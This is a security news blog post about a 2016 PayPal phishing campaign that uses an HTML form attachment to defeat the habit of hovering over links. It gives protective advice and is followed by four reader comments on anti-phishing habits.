Regular readers are familiar with our ongoing coverage of phishing attacks.
Recently, we reported on an Apple ID SMS-based phishing scam, and described how tax-related phishing attacks surged by 400 percent this year.
The continued success of these and other phishing campaigns reveal a persistent deficit of security awareness among users. Indeed, as we shared in an article earlier in 2016, Tripwire found that more than half (52 percent) of respondents for a survey conducted at RSA were “not confident” in their ability to spot a phishing attack.
That’s troubling news. And as attacks continue to grow in sophistication, it’ll only get harder to spot a phish.
On Monday, UK malware researcher @dvk01uk came across the phishing campaign.
This sophisticated technique negates a common anti-phishing tactic: hovering over a URL to confirm it points to where you would expect it to point.
Fortunately, users can protect themselves against this phishing technique, though for how long remains to be seen. The malware researcher @dvk01uk expands upon this point in a blog post:
“The only saving grace with this particular phishing attack is that the phishing page is a HTML page / form that they tell you to open on your computer and not a link to a website. The advice we always give to NOT open any attachments to emails and definitely do not fill in html form attachments should protect you. But once a phisher puts this onto a website with a plausible & believable URL, then all bets are off and it will be almost impossible to detect the phish. This is very worrying.”
Fortunately, PayPal offers users the ability to enable two-step verification, which will help protect their accounts even in the event someone compromises users’ passwords.
Found this article interesting? Follow Graham Cluley on Twitter or Mastodon to read more of the exclusive content we post.
4 comments on “Think hovering your mouse over the URL will save you? Think again!”
I've been using a non-html mail client since 1995.
PayPal are their own worst enemy when it comes to phishing. They proclaim they are anti-phishing but have links on their 'Your … statement is available' emails that look suspicious. I check them out because I'm a security professional but the average person either tires of this process or doesn't know how to to begin with. Their users have no confidence that they are safe. Best practice is to give no link at all and get the user to go to a known safe bookmark or type it in from scratch. I've emailed them. Guess how much response I got:-(
Paypal 2FA is not available in all countries! Why not?
I always login to the site by typing the url, check the SSL padlock before I login, and then login to see a statement or whatever. I have the motto, "If something is running on your computer that is not part of the OS, then you really ought to know what it does and why it is running." Also, "Don't install something because you've been prompted to. Only install stuff you want." That, and MJ Registry Watcher have kept me safe for many years!